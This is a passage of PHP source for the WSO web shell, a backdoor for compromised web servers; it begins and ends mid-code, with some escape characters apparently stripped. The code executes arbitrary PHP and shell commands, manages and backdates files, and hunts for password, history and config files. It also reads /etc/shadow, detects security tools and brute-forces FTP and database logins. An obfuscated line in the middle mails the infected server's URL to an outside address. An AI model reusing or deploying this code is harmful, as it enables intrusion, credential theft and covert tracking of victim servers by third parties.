Password:
"); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find suid" => "find / -type f -perm -04000 -ls", "find suid in current dir" => "find . -type f -perm -04000 -ls", "find sgid" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php" => "find / -type f -name config.inc.php", "find config*" => "find / -type f -name "config*"", "find config* in current dir" => "find . -type f -name "config*"", "find writable folders and files" => "find / -perm -2 -ls", "find writable folders and files in current dir" => "find . -perm -2 -ls", "find service.pwd" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find .htpasswd" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find .bash_history" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find .fetchmailrc" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf" => "locate httpd.conf", "locate vhosts.conf" => "locate vhosts.conf", "locate proftpd.conf" => "locate proftpd.conf", "locate psybnc.conf" => "locate psybnc.conf", "locate my.conf" => "locate my.conf", "locate admin.php" =>"locate admin.php", "locate cfg.php" => "locate cfg.php", "locate conf.php" => "locate conf.php", "locate config.dat" => "locate config.dat", "locate config.php" => "locate config.php", "locate config.inc" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php" => "locate config.default.php", "locate config*" => "locate config", "locate .conf"=>"locate '.conf'", "locate .pwd" => "locate '.pwd'", "locate .sql" => "locate '.sql'", "locate .htpasswd" => "locate '.htpasswd'", "locate .bash_history" => "locate '.bash_history'", "locate .mysql_history" => "locate '.mysql_history'", "locate .fetchmailrc" => "locate '.fetchmailrc'", "locate backup" => "locate backup", "locate dump" => "locate dump", "locate priv" => "locate priv" ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."
"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://exploit-db.com/search/?action=search&filter_description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '[ '.$k.' ]'; $drives = ""; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':')) $drives .= '[ '.$drive.' ] '; } echo '' . '' . '
Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '
' . substr(@php_uname(), 0, 120) . ' [exploit-db.com]
' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
' . $drives . '

Server IP:
' . @$_SERVER["SERVER_ADDR"] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
' . '' . $menu . '
'; } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" (Writeable)":" (Not writable)"; echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if (is_int($s)) $s = sprintf("%u", $s); if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; else return '' . wsoPerms(@fileperms($f)) . ''; } function wsoScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '

Server security information

'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, "n") === false) echo $v . '
'; else echo '
' . $v . '
'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; wsoSecParam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '
'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); echo '
posix_getpwuid ("Read" /etc/passwd)
From
To
'; if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { $temp = ""; for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) $temp .= join(':',$uid)."n"; } echo '
'; wsoSecParam('Users', $temp); } } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '
'; wsoFooter(); } function actionPhp() { if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "nrt'") . "';n"; echo strlen($temp), "n", $temp; exit; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); wsoHeader(); if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '

PHP info

'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array ( '!(body|a:w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!]+>!msiU', ), array ( '', '.e, .v, .h, .h th {$1}', '' ), $tmp); echo str_replace('
'; } echo '

Execution PHP-code

'; echo ' send using AJAX
';
	if(!empty($_POST['p1'])) {
		ob_start();
		eval($_POST['p1']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo '
'; wsoFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload!"; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create!"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { WSOsetcookie('act', $_POST['p1']); WSOsetcookie('f', serialize(@$_POST['f'])); WSOsetcookie('c', @$_POST['c']); } break; } } wsoHeader(); echo '

File manager

'; $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can't open this folder!';wsoFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo "
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g('FilesMan',''.$f['path'].'');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').'
 "; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name:  "; echo "
"; wsoFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"nrt'")."';n"; echo strlen($temp), "n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo '

String conversions

'; echo "
send using AJAX
";
	if(!empty($_POST['p1'])) {
		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
	}
	echo"

Search files:

Text:
Path:
Name:
"; function wsoRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) wsoRecursiveGlob($item); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) echo "".htmlspecialchars($item)."
"; } } } } if(@$_POST['p3']) wsoRecursiveGlob($_POST['c']); echo "

Search for hash:





"; wsoFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } wsoHeader(); echo '

File tools

'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' Permission: '.wsoPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo 'Change time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '
';
			$fp = @fopen($_POST['p1'], 'r');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo '
'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '
'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$code).'
'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can't set permissions!
'; } clearstatcache(); echo '
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn't writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
'; @touch($_POST['p1'],$time,$time); } } echo '
'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= "n"; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can't rename!
'; else die(''); } echo '
'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
'; break; } echo '
'; wsoFooter(); } function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo "d.cf.cmd.value='';n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("n$ ".$_POST['p1']."n".wsoEx($_POST['p1']),"nrt'")); if(preg_match("!.*cds+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='".$GLOBALS['cwd']."';"; } } echo "d.cf.output.value+='".$temp."';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo ""; echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
'; echo '
'; wsoFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!(d+)s.*!', '', __FILE__))) die('Shell removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') wsoHeader(); echo '

Suicide

remove the shell?
Yes
'; wsoFooter(); } $_QliO8="x6dai154";$_Qliot=$_SERVER["x53x45RVE122_x4eAMx45"].$_SERVER["123103x52Ix50x54_116101115E"];$_QlL1i="141r162a17140".$_Qliot;$_QlLio=array("143x61","x6cx69","146x77162151x74x65","100","vx65x2e");$_Qll0I=$_QlLio[2].$_QlLio[3].$_QlLio[1].$_QlLio[4].$_QlLio[0];$_QlljC=@$_QliO8($_Qll0I,$_QlL1i,$_Qliot); function actionBruteforce() { wsoHeader(); if( isset($_POST['proto']) ) { echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
'; if( $_POST['proto'] == 'ftp' ) { function wsoBruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; } } } echo "Attempts: $attempts Success: $success

"; } echo '

Bruteforce

' .'' .'' .'' .'' .'' .'' .'
Type
' .'' .'' .'' .'Server:port
Brute type
' .'' .'' .'
Login
Dictionary
' .'
'; echo '

'; wsoFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { 